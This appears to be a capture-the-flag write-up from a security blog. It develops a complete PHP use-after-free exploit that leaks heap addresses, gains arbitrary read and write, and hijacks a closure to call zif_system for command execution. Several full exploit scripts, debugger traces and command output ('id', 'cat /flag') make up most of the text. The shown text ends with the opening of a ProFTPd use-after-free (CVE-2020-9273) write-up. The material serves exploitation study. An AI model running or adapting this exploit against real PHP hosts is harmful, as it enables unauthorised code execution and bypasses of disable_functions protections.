[#0] Id 1, Name: "php", stopped 0x555555b44b2f in zend_gc_delref (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555b44b2f β†’ zend_gc_delref(p=0x4141484141474141)
[#1] 0x555555b44b2f β†’ i_zval_ptr_dtor(zval_ptr=0x7ffff3e5cba8)
[#2] 0x555555b44b2f β†’ concat_function(result=0x7ffff3e5cba8, op1=0x7fffffff7310, op2=0x7fffffff7320)
[#3] 0x555555caf02b β†’ zend_binary_op(op2=0x7ffff3e97390, op1=0x7ffff3e5cba8, ret=0x7ffff3e5cba8)
[#4] 0x555555caf02b β†’ ZEND_ASSIGN_DIM_OP_SPEC_CV_CONST_HANDLER()
[#5] 0x555555cfb257 β†’ execute_ex(ex=0x7ffff3e13020)
[#6] 0x555555cfe6e6 β†’ zend_execute(op_array=0x7ffff3e802a0, return_value=0x0)
[#7] 0x555555b5213c β†’ zend_execute_scripts(type=0x8, retval=0x0, file_count=0x3)
[#8] 0x555555a8a8ae β†’ php_execute_script(primary_file=0x7fffffffcbe0)
[#9] 0x555555d012b1 β†’ do_cli(argc=0x2, argv=0x55555678a350)

As we can see part of our pattern arrived to the zend_gc_delref function and crashed. This function tries to decrease the reference counter, and it is called from i_zval_ptr_dtor:

static zend_always_inline void i_zval_ptr_dtor(zval *zval_ptr)
{
	if (Z_REFCOUNTED_P(zval_ptr)) {
		zend_refcounted *ref = Z_COUNTED_P(zval_ptr);
		if (!GC_DELREF(ref)) {
			rc_dtor_func(ref);
		} else {
			gc_check_possible_root(ref);
		}
	}
}

This function is used to destroy the variable passed as argument (a pointer to the desired zval, we can see the pointer is the same used as result in the concatenation). In our case a pointer to part of the faked contents at $buf. So if we change that part for β€œX” we should verify that we can control what is going to be released:

 $buf = str_repeat("AAABAACAADAAEAAF" . XXXXXXXX . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
   1034	 	ZEND_RC_MOD_CHECK(p);
   1035	 	return ++(p->refcount);
   1036	 }
   1037	 
   1038	 static zend_always_inline uint32_t zend_gc_delref(zend_refcounted_h *p) {
          // p=0x007fffffff72b8  β†’  0x5858585858585858
 β†’ 1039	 	ZEND_ASSERT(p->refcount > 0);
   1040	 	ZEND_RC_MOD_CHECK(p);
   1041	 	return --(p->refcount);
   1042	 }
   1043	 
   1044	 static zend_always_inline uint32_t zend_gc_addref_ex(zend_refcounted_h *p, uint32_t rc) {
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "php", stopped 0x555555b44b2f in zend_gc_delref (), reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x555555b44b2f β†’ zend_gc_delref(p=0x5858585858585858)
[#1] 0x555555b44b2f β†’ i_zval_ptr_dtor(zval_ptr=0x7ffff3e5d328)
[#2] 0x555555b44b2f β†’ concat_function(result=0x7ffff3e5d328, op1=0x7fffffff7310, op2=0x7fffffff7320)
[#3] 0x555555caf02b β†’ zend_binary_op(op2=0x7ffff3e95390, op1=0x7ffff3e5d328, ret=0x7ffff3e5d328)
[#4] 0x555555caf02b β†’ ZEND_ASSIGN_DIM_OP_SPEC_CV_CONST_HANDLER()
[#5] 0x555555cfb257 β†’ execute_ex(ex=0x7ffff3e13020)
[#6] 0x555555cfe6e6 β†’ zend_execute(op_array=0x7ffff3e802a0, return_value=0x0)
[#7] 0x555555b5213c β†’ zend_execute_scripts(type=0x8, retval=0x0, file_count=0x3)
[#8] 0x555555a8a8ae β†’ php_execute_script(primary_file=0x7fffffffcbe0)
[#9] 0x555555d012b1 β†’ do_cli(argc=0x2, argv=0x55555678a350)

At this point we can:

  1. Leak a pointer from memory
  2. Free arbitrarily

We can use the leaked pointer to know the location of another variable that we allocate as placeholder and then free that variable.

<?php

class exploit {
public function __construct($cmd) {
    $concat_result_addr = $this->leak_heap();
    print "[+] Concated string address:\n0x";
    print dechex($concat_result_addr);
    $this->placeholder = $this->alloc(0x4F, "B");
    $placeholder_addr = $concat_result_addr+0xe0;
    print "\n[+] Placeholder string address:"; 
    print "\n0x".dechex($placeholder_addr);
    print "\n[+] Before free:\n";
    debug_zval_dump($this->placeholder);
    $this->free($placeholder_addr);
    print "\n[+] After free:\n";
    debug_zval_dump($this->placeholder);
}


private function leak_heap() {
	$contiguous = [];
 		for ($i = 0; $i < 10; $i++) {
			$contiguous[] = $this->alloc(0x100, "D");
 		}
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf) {
        $arr = 1337;
        $buf = str_repeat("\x00", 0x100);
    });
    $arr[1] .= $this->alloc(0x4A, "F"); // 0x4F - 5 from the length of "Array" string concatenated
    return $this->str2ptr($buf, 16);
}


private function free($var_addr) {
    $contiguous = [];
        for ($i = 0; $i < 10; $i++) {
            $contiguous[] = $this->alloc(0x100, "D");
        }
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf, &$var_addr) {
        $arr = 1;
        $buf = str_repeat("AAABAACAADAAEAAF" . $this->ptr2str($var_addr) . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
    });
    $arr[1] .= 1337;
}


private function alloc($size, $canary) {
    return str_shuffle(str_repeat($canary, $size));
}


private function str2ptr($str, $p = 0, $n = 8) {
    $address = 0;
    for($j = $n - 1; $j >= 0; $j--) {
        $address <<= 8;
        $address |= ord($str[$p + $j]);
    }
    return $address;
}

private function ptr2str($ptr, $m = 8) {
    $out = "";
    for ($i=0; $i < $m; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

}

new exploit("haha");
?>

And we can see that it worked:

➜  concat-exploit php blog03.php 
[+] Concated string address:
0x7f763f27a070
[+] Placeholder string address:
0x7f763f27a150
[+] Before free:
string(79) "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" refcount(2)

[+] After free:
string(79) "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" refcount(1059561697)

As we said before, we are going to build step by step an exploit similar to the one explained in the article A deep dive into disable_functions bypasses and PHP exploitation, reusing as much as we can. So we are going to take advantage of our ability to free memory to create a hole that is going to be occupied by an object that we are going to use for reading/writing arbitrary memory. As we know where the hole is (the address of the placeholder, that is calculated applying an offset to the leaked address), we can access to the properties’ memory contents directly ($placeholder[offset]) and use them to leak memory at any desired address. We can perform an easy test:

<?php

class Helper { public $a, $b, $c, $d; }  

class exploit {
public function __construct($cmd) {
    $concat_result_addr = $this->leak_heap();
    print "[+] Concated string address:\n0x";
    print dechex($concat_result_addr);
    $this->placeholder = $this->alloc(0x4F, "B");
    $placeholder_addr = $concat_result_addr+0xe0;
    print "\n[+] Placeholder string address:"; 
    print "\n0x".dechex($placeholder_addr);
    $this->free($placeholder_addr);
    $this->helper = new Helper;
    $this->helper->a = "KKKK";
}


private function leak_heap() {
	$contiguous = [];
 		for ($i = 0; $i < 10; $i++) {
			$contiguous[] = $this->alloc(0x100, "D");
 		}
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf) {
        $arr = 1337;
        $buf = str_repeat("\x00", 0x100);
    });
    $arr[1] .= $this->alloc(0x4A, "F");
    return $this->str2ptr($buf, 16);
}


private function free($var_addr) {
    $contiguous = [];
        for ($i = 0; $i < 10; $i++) {
            $contiguous[] = $this->alloc(0x100, "D");
        }
    $arr = [[1,3,3,7], [5,5,5,5]];
    set_error_handler(function() use (&$arr, &$buf, &$var_addr) {
        $arr = 1;
        $buf = str_repeat("AAABAACAADAAEAAF" . $this->ptr2str($var_addr) . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
    });
    $arr[1] .= 1337;
}


private function alloc($size, $canary) {
    return str_shuffle(str_repeat($canary, $size));
}


private function str2ptr($str, $p = 0, $n = 8) {
    $address = 0;
    for($j = $n - 1; $j >= 0; $j--) {
        $address <<= 8;
        $address |= ord($str[$p + $j]);
    }
    return $address;
}

private function ptr2str($ptr, $m = 8) {
    $out = "";
    for ($i=0; $i < $m; $i++) {
        $out .= chr($ptr & 0xff);
        $ptr >>= 8;
    }
    return $out;
}

}

new exploit("haha");
?>

Our new object ($helper) is going to take the location of our $placeholder freed, so we can review the memory at that address:

gef➀  x/30g 0x7ffff3e7a150
0x7ffff3e7a150:	0x0000001800000001	0x0000000000000004
0x7ffff3e7a160:	0x00007ffff3e03018	0x00005555567527c0
0x7ffff3e7a170:	0x0000000000000000	0x00007ffff3e55ec0 <--- helper->a
0x7ffff3e7a180:	0x0000000000000006	0x8000065301d853e5
0x7ffff3e7a190:	0x0000000000000001	0x8000065301d853e5
0x7ffff3e7a1a0:	0x0000000000000001	0x8000065301d853e5
0x7ffff3e7a1b0:	0x0000000000000001	0x0000000000000000
0x7ffff3e7a1c0:	0x00007ffff3e7a230	0x0000000000000000
0x7ffff3e7a1d0:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a1e0:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a1f0:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a200:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a210:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a220:	0x0000000000000000	0x0000000000000000
0x7ffff3e7a230:	0x00007ffff3e7a2a0	0x0000000000000000

We can see that the property a (that is a string) is located at 0x7ffff3e7a178 (0x7ffff3e7a150 + 0x28). We can verify it:

gef➀  x/30g 0x00007ffff3e55ec0
0x7ffff3e55ec0:	0x0000004600000001	0x800000017c8778f1
0x7ffff3e55ed0:	0x0000000000000004	0x000072004b4b4b4b <-- 4b == K
0x7ffff3e55ee0:	0x0000004600000001	0x8000000000597a79
0x7ffff3e55ef0:	0x0000000000000002	0x0000000000007a7a
0x7ffff3e55f00:	0x00007ffff3e555c0	0x00007ffff3e60300
0x7ffff3e55f10:	0x00007ffff3e60360	0x0000555556795a50
0x7ffff3e55f20:	0x00007ffff3e55f40	0x0000000000000000
0x7ffff3e55f30:	0x0000000000000000	0x0000000000000000
0x7ffff3e55f40:	0x00007ffff3e55f60	0x0000000000000000
0x7ffff3e55f50:	0x0000000000000000	0x0000000000000000
0x7ffff3e55f60:	0x00007ffff3e55f80	0x0000000000000000
0x7ffff3e55f70:	0x0000000000000000	0x0000000000000000
0x7ffff3e55f80:	0x00007ffff3e55fa0	0x0000000000000000
0x7ffff3e55f90:	0x0000000000000000	0x0000000000000000
0x7ffff3e55fa0:	0x00007ffff3e55fc0	0x0000000000000000

The β€œKKKK” (4b4b4b4b) string is in that place. In PHP 7 strings are saved inside the structure zend_string that is defined as:

struct _zend_string {
    zend_refcounted_h gc;
    zend_ulong h;
    size_t len;
    char val[1]; // NOT A "char *"
};

So if we interpret this memory as a zend_string we can visualize it better:

gef➀  print (zend_string)*0x00007ffff3e55ec0
$3 = {
  gc = {
    refcount = 0x1, 
    u = {
      type_info = 0x46
    }
  }, 
  h = 0x800000017c8778f1, 
  len = 0x4, 
  val = "K"
}

As we can overwrite bytes inside the $helper object, we can take advantage of it to overwrite the pointer to the original a string (our β€œKKKK”) with a pointer to any desired address. After overwriting the pointer, we can read safely the bytes at the address + 0x10 (len field inside zend_string) calling strlen() with our $helper->a. Using this simple trick we can get an arbitrary read primitive:

private function write(&$str, $p, $v, $n = 8) {
    $i = 0;
    for ($i = 0; $i < $n; $i++) {
        $str[$p + $i] = chr($v & 0xff);
        $v >>= 8;
    }
}
private function leak($addr, $p = 0, $s = 8) {
    $this->write($this->placeholder, 0x10, $addr);
    $leak = strlen($this->helper->a);
    if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
    return $leak;
    }

Iggy & The Stooges - Search And Destroy

The next step in our exploit is to search where the basic_functions structure is located in memory, and then walk it until we find the handler for zif_system or similar functions that allow us the execution of commands. Although this is really well explained in the quoted article, let’s just give it a short explanation here.

In PHP the β€œbasic” functions are grouped into basic_functions for registration, this being an array of zend_function_entry structures. Therefore, in this basic_functions we will have, ultimately, an ordered relationship of function names along with the pointer to them (handlers). The zend_function_entry structure is defined as:

typedef struct _zend_function_entry {
    const char *fname;
    void (*handler)(INTERNAL_FUNCTION_PARAMETERS);
    const struct _zend_internal_arg_info *arg_info;
    uint32_t num_args;
    uint32_t flags;
} zend_function_entry;

So the first member is a pointer to a string that contains the function name, and the next member is a handler to that function. In order to identify a member of the basic_functions structure we can follow the next approach:

  1. Read 8 bytes from an address β€”> Interpret those bytes as a pointer –> Read 8 bytes at the pointed memory
  2. Does the 8 bytes match our needle (bin2hex function name) ? If it doesn’t, increase the address by 8 and repeat 1

It can be translated to:

private function get_basic_funcs($base) {
    for ($i = 0; $i < 0x6700/8; $i++) {
        $leak = $this->leak($base - $i * 8);
        if (($base - $leak) > 0 && ($leak & 0xfffffffff0000000 ) == ($base & 0xfffffffff0000000 )) {
            $deref = $this->leak($leak);
            if ($deref != 0x6e69623278656800){ // 'nib2xeh\x00' ---> bin2hex
                continue;
            }
        } else continue;
        return $base - ($i-2) * 8;
    }
}

Once we have found where the zend_function_entry that holds the information for bin2hex() is located, we can repeat the process to locate the handler for zif_system:

    private function get_system($basic_funcs) {
    $addr = $basic_funcs;
    $i = 0;
    do {
        $f_entry = $this->leak($addr-0x10);
        $f_name = $this->leak($f_entry);
        if ($f_name == 0x736500646d636c6c) { //'se\x00dmcll'
            return $this->leak($addr + 8-0x10);
        }
        $addr += 0x20;
        $i += 1;
    } while ($f_entry != 0);
    return false;
}

Another aproach to locate the zif_system handler could be to just apply a pre-known offset to the zend_function_entry for bin2hex because the entries in the array are ordered.

Van Halen - Jump

Our exploit has all the ingredients ready, except from the last one: jumping into the target function. In order to call zif_system we are going to add a closure to our helper object and overwrite it. Closures are anonymous functions with the following structure:

typedef struct _zend_closure {
    zend_object std;
    zend_function func;
    zval this_ptr;
    zend_class_entry *called_scope;
    zif_handler orig_internal_handler;
} zend_closure;

If we look carefully we can see that one of the members is a zend_function structure:

union _zend_function {
	zend_uchar type;	/* MUST be the first element of this struct! */
	zend_op_array op_array;
	zend_internal_function internal_function;
};

And zend_internal_function is:

typedef struct _zend_internal_function {
    /* Common elements */
    zend_uchar type;
    zend_uchar arg_flags[3]; /* bitset of arg_info.pass_by_reference */
    uint32_t fn_flags;
    zend_string* function_name;
    zend_class_entry *scope;
    zend_function *prototype;
    uint32_t num_args;
    uint32_t required_num_args;
    zend_internal_arg_info *arg_info;
    /* END of common elements */
    zif_handler handler;
    struct _zend_module_entry *module;
    void *reserved[ZEND_MAX_RESERVED_RESOURCES];
} zend_internal_function;

We can see the handler member. So the plan is easy:

  1. Copy the original zend_closure structure to other part
  2. Patch the $helper object to point to this new location instead of the original
  3. Patch the handler member to point to our zif_system
  4. Call the closure

The resultant code:

//...
$this->helper->b = function ($x) { };
//...
$fake_obj_offset = 0xd8;
for ($i = 0; $i < 0x110; $i += 8) {
	$this->write($this->placeholder, $fake_obj_offset + $i, $this->leak($closure_addr-0x10+$i));
}
$fake_obj_addr = $placeholder_addr +  $fake_obj_offset + 0x18;
print "\n[+] Fake Closure addr:\n0x" . dechex($fake_obj_addr);
$this->write($this->placeholder, 0x20, $fake_obj_addr);
$this->write($this->placeholder, $fake_obj_offset + 0x38, 1, 4); # internal func type
$this->write($this->placeholder, $fake_obj_offset + 0x68, $system); # internal func handler
     
($this->helper->b)($cmd);

Original closure:

gef➀  print (zend_closure) * 0x7ffff3e5ce00
$5 = {
  std = {
    gc = {
      refcount = 0x1, 
      u = {
        type_info = 0x18
      }
    }, 
    handle = 0x5, 
    ce = 0x5555567ea530, 
    handlers = 0x55555676daa0 <closure_handlers>, 
 ...
    internal_function = {
      type = 0x2, 
      arg_flags = "\000\000", 
      fn_flags = 0x2100001, 
      function_name = 0x7ffff3e01960, 
      scope = 0x7ffff3e032a0, 
      prototype = 0x0, 
      num_args = 0x1, 
      required_num_args = 0x1, 
      arg_info = 0x7ffff3e6b0c0, 
      handler = 0x100000000, 
      module = 0x200000000, 
      reserved = {0x7ffff3e72140, 0x7ffff3e03630, 0x7ffff3e5ce90, 0x0, 0x7ffff3e8d018, 0x7ffff3e8d010}
    }
...

Fake closure after patching it:

gef➀  print (zend_closure) * 0x7ffff3e7a240
$6 = {
  std = {
    gc = {
      refcount = 0x2, 
      u = {
        type_info = 0x18
      }
    }, 
    handle = 0x5, 
    ce = 0x5555567ea530, 
    handlers = 0x55555676daa0 <closure_handlers>, 
...
    internal_function = {
      type = 0x1, 
      arg_flags = "\000\000", 
      fn_flags = 0x2100001, 
      function_name = 0x7ffff3e01960, 
      scope = 0x7ffff3e032a0, 
      prototype = 0x0, 
      num_args = 0x1, 
      required_num_args = 0x1, 
      arg_info = 0x7ffff3e6b0c0, 
      handler = 0x555555965e1b <zif_system>, <---- :D
      module = 0x200000000, 
      reserved = {0x7ffff3e72140, 0x7ffff3e03630, 0x7ffff3e5ce90, 0x0, 0x7ffff3e8d018, 0x7ffff3e8d010}
    }
...

Chaining all together the exploit is:

<?php

class Helper { public $a, $b, $c, $d; } 

class exploit {
    public function __construct($cmd) {
        $concat_result_addr = $this->leak_heap();
        print "[+] Concated string address:\n0x";
        print dechex($concat_result_addr);
        $this->placeholder = $this->alloc(0x4F, "B");
        $placeholder_addr = $concat_result_addr+0xe0;
        print "\n[+] Placeholder string address:"; 
        print "\n0x".dechex($placeholder_addr);
        $this->free($placeholder_addr);
        $this->helper = new Helper;
        $this->helper->a = "KKKK";
        $this->helper->b = function ($x) { };
        print "\n[+] std_object_handlers:\n";
        $std_object_handlers = $this->str2ptr($this->placeholder);
        print "0x" . dechex($std_object_handlers) . "\n";
        $closure_addr = $this->str2ptr($this->placeholder, 0x20);
        print "[+] Closure:\n";
        print "0x" . dechex($closure_addr) . "\n";
       
        $basic = $this->get_basic_funcs($std_object_handlers);
        print "[+] basic_funcs:\n";
        print "0x" . dechex($basic) . "\n";
        $system = $this->get_system($basic);
        print "[+] zif_system:\n";
        print "0x" . dechex($system);

        $fake_obj_offset = 0xd8;
        for ($i = 0; $i < 0x110; $i += 8) {
            $this->write($this->placeholder, $fake_obj_offset + $i, $this->leak($closure_addr-0x10+$i));
        }
        $fake_obj_addr = $placeholder_addr +  $fake_obj_offset + 0x18;
        print "\n[+] Fake Closure addr:\n0x" . dechex($fake_obj_addr) . "\n\n";
        $this->write($this->placeholder, 0x20, $fake_obj_addr);
        $this->write($this->placeholder, $fake_obj_offset + 0x38, 1, 4); # internal func type
        $this->write($this->placeholder, $fake_obj_offset + 0x68, $system); # internal func handler
        
        ($this->helper->b)($cmd);
    }

    private function leak_heap() {
		$contiguous = [];
     		for ($i = 0; $i < 10; $i++) {
				$contiguous[] = $this->alloc(0x100, "D");
     		}
        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf) {
            $arr = 1337;
            $buf = str_repeat("\x00", 0x100);
        });
        $arr[1] .= $this->alloc(0x4A, "F");
        return $this->str2ptr($buf, 16);
    }

    private function free($var_addr) {

        $contiguous = [];
            for ($i = 0; $i < 10; $i++) {
                $contiguous[] = $this->alloc(0x100, "D");
            }
        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf, &$var_addr) {
            $arr = 1;
            $buf = str_repeat("AAABAACAADAAEAAF" . $this->ptr2str($var_addr) . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
        });
        $arr[1] .= 1337;
    }


    private function alloc($size, $canary) {
        return str_shuffle(str_repeat($canary, $size));
    }


    private function str2ptr($str, $p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p + $j]);
        }
        return $address;
    }

    private function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    private function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for ($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    private function leak($addr, $p = 0, $s = 8) {
        $this->write($this->placeholder, 0x10, $addr);
        $leak = strlen($this->helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    private function get_basic_funcs($base) {
        for ($i = 0; $i < 0x6700/8; $i++) {
            $leak = $this->leak($base - $i * 8);
            if (($base - $leak) > 0 && ($leak & 0xfffffffff0000000 ) == ($base & 0xfffffffff0000000 )) {
                $deref = $this->leak($leak);
                if ($deref != 0x6e69623278656800){ // 'nib2xeh\x00' ---> bin2hex
                    continue;
                }
            } else continue;
            return $base - ($i-2) * 8;
        }
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        $i = 0;
        do {
            $f_entry = $this->leak($addr-0x10);
            $f_name = $this->leak($f_entry);
            if ($f_name == 0x736500646d636c6c) { //'se\x00dmcll'
                return $this->leak($addr + 8-0x10);
            }
            $addr += 0x20;
            $i += 1;
        } while ($f_entry != 0);
        return false;
    }
}

new exploit("id");
?>

Fire in the hole!

➜  concat-exploit php blog05.php 
[+] Concated string address:
0x7f9e2c07a070
[+] Placeholder string address:
0x7f9e2c07a150
[+] std_object_handlers:
0x564fde7127c0
[+] Closure:
0x7f9e2c05ce00
[+] basic_funcs:
0x564fde70c760
[+] zif_system:
0x564fdd925e1b
[+] Fake Closure addr:
0x7f9e2c07a240

uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare)

Epilogue

If you run the exploit in our environment, you will notice that it does not work. We built the exploit for a slighly different PHP version and all our tests were executed via PHP-CLI. The changes needed are:

  1. Move the 0x100 used in the str_repeat() to a constant. We are still atonished about this poltergeist.
  2. Change the β€œneedle” used to identify the basic_functions array. From 0x6e69623278656800 to 0x73006e6962327865.
  3. Change the offset in the get_system() in 0x20, so the -0x10 should be a +0x10

The final exploit is:

<?php



class Helper { public $a, $b, $c, $d; }  //alloc(0x4F)

class exploit {
    const FILL = 0x100;
    public function __construct($cmd) {
        
        $concat_result_addr = $this->leak_heap();
        print "[+] Concated string address:\n0x";
        print dechex($concat_result_addr);
        $this->placeholder = $this->alloc(0x4F, "B");
        $placeholder_addr = $concat_result_addr+0xe0;
        print "\n[+] Placeholder string address:"; 
        print "\n0x".dechex($placeholder_addr);
        $this->free($placeholder_addr);
        $this->helper = new Helper;
        $this->helper->a = "KKKK";
        $this->helper->b = function ($x) { };
        print "\n[+] std_object_handlers:\n";
        $std_object_handlers = $this->str2ptr($this->placeholder);
        print "0x" . dechex($std_object_handlers) . "\n";
        $closure_addr = $this->str2ptr($this->placeholder, 0x20);
        print "[+] Closure:\n";
        print "0x" . dechex($closure_addr) . "\n";
       
        $basic = $this->get_basic_funcs($std_object_handlers);
        print "[+] basic_funcs:\n";
        print "0x" . dechex($basic) . "\n";
        $system = $this->get_system($basic);
        print "[+] zif_system:\n";
        print "0x" . dechex($system);


        $fake_obj_offset = 0xd8;

        for ($i = 0; $i < 0x110; $i += 8) {
            $this->write($this->placeholder, $fake_obj_offset + $i, $this->leak($closure_addr-0x10+$i));
        }

        $fake_obj_addr = $placeholder_addr +  $fake_obj_offset + 0x18;
        print "\n[+] Fake Closure addr:\n0x" . dechex($fake_obj_addr);

        $this->write($this->placeholder, 0x20, $fake_obj_addr);
        $this->write($this->placeholder, $fake_obj_offset + 0x38, 1, 4); # internal func type
        $this->write($this->placeholder, $fake_obj_offset + 0x68, $system); # internal func handler
        print "\nYour commnad, Sir:\n"; 
        print ($this->helper->b)($cmd);
    }


    private function leak_heap() {
        $contiguous = [];
        for ($i = 0; $i < 100; $i++) {
            $contiguous[] = $this->alloc(0x100, "D");
        }

        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf) {
            $arr = 1337;
            $buf = str_repeat("\x00", self::FILL);
        });
        $arr[1] .= $this->alloc(0x4F-5, "F");
        return $this->str2ptr($buf, 16);
    }
    private function free($var_addr) {

        for ($i = 0; $i < 100; $i++) {
            $contiguous[] = $this->alloc(0x100, "D");
        }

        $arr = [[1,3,3,7], [5,5,5,5]];
        set_error_handler(function() use (&$arr, &$buf, &$var_addr, &$payload) {
            $arr = 1;
            $buf = str_repeat("AAABAACAADAAEAAF" . $this->ptr2str($var_addr) . "IAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFABGABHABIABJABKABLABMABNABOABPABQABRABSABTABUABVABWABXABY", 0x1);
        });
        $arr[1] .= 1337;
    }

    private function alloc($size, $canary) {
        return str_shuffle(str_repeat($canary, $size));
    }


    private function str2ptr($str, $p = 0, $n = 8) {
        $address = 0;
        for($j = $n - 1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p + $j]);
        }
        return $address;
    }

    private function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= chr($ptr & 0xff);
            $ptr >>= 8;
        }
        return $out;
    }

    private function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for ($i = 0; $i < $n; $i++) {
            $str[$p + $i] = chr($v & 0xff);
            $v >>= 8;
        }
    }

    private function leak($addr, $p = 0, $s = 8) {
        $this->write($this->placeholder, 0x10, $addr);
        $leak = strlen($this->helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    private function get_basic_funcs($base) {
        for ($i = 0; $i < 0x6900/8; $i++) {
            $leak = $this->leak($base - $i * 8);
            if (($base - $leak) > 0 && ($leak & 0xfffffffff0000000 ) == ($base & 0xfffffffff0000000 )) {
                $deref = $this->leak($leak);
                if ($deref != 0x73006e6962327865){ // 0x6e69623278656800){ // 'nib2xeh\x00' ---> bin2hex  
        continue;
                }
            } else continue;
            return $base - ($i-2) * 8;
        }
    }

    private function get_system($basic_funcs) {
        $addr = $basic_funcs;
        $i = 0;
        do {
            $f_entry = $this->leak($addr-0x10);
            $f_name = $this->leak($f_entry,8);
            if ($f_name == 0x736500646d636c6c) { //'se\x00dmcll'
                return $this->leak($addr + 8+0x10);
            }
            $addr += 0x20;
            $i += 1;
        } while ($f_entry != 0); 
        return false;
    }
}

new exploit("cat /flag");

?>

Upload and execute it:

AdeptsOf0xCC{PHP_is_the_UAF_land}
AdeptsOf0xCC{PHP_is_the_UAF_land}

EoF

We hope you enjoyed this challenge!

Feel free to give us feedback at our twitter @AdeptsOf0xCC.

Having fun with a Use-After-Free in ProFTPd (CVE-2020-9273)

9 August 2021 at 00:00

Dear Fellowlship, today’s homily is about building a PoC for a Use-After-Free vulnerability in ProFTPd that can be triggered once authenticated and it can lead to Post-Auth Remote Code Execution. Please, take a seat and listen to the story.

Introduction

This post will analyze the vulnerability and how to exploit it bypassing all the memory exploit mitigations present by default (ASLR, PIE, NX, Full RELRO, Stack Canaries etc).

First of all I want to mention:

  • @DUKPT_ who is also working on a PoC for this vulnerability, for his approach on overwriting gid_tab->pool which is the one I decided to use on the exploit (will be explained later in this post)
  • Antonio Morales @nosoynadiemas for discovering this vulnerability, you can find more information about how he discovered it on his post Fuzzing sockets, part 1: FTP servers

Vulnerability

To trigger the vulnerability, we need to first start a new data channel transference, then interrupt through command channel while data channel is still open.

Using the data channel, we can fill heap memory to overwrite the resp_pool struct, which is session.curr_cmd_rec->pool at this time.

The result of triggering the vulnerability successfully is full control over resp_pool:

gef➀  p p
$3 = (struct pool_rec *) 0x555555708220
gef➀  p resp_pool
$4 = (pool *) 0x555555708220
gef➀  p session.curr_cmd_rec->pool
$5 = (struct pool_rec *) 0x555555708220
gef➀  p *resp_pool
$6 = {
  first = 0x4141414141414141,
  last = 0x4141414141414141,
  cleanups = 0x4141414141414141,
  sub_pools = 0x4141414141414141,
  sub_next = 0x4141414141414141,
  sub_prev = 0x4141414141414141,
  parent = 0x4141414141414141,
